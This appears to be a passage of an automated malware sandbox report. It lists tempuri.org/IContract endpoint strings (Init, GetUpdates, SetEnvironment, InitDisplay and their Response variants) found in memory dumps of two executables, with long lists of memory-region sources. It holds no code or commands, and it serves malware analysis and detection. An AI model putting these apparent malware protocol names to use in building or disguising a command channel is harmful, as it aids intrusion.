                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdates
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdatesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdatesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/GetUpdatesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/H
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/H9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/Init
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplay
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplayLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplayResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplayResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironment
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentLR
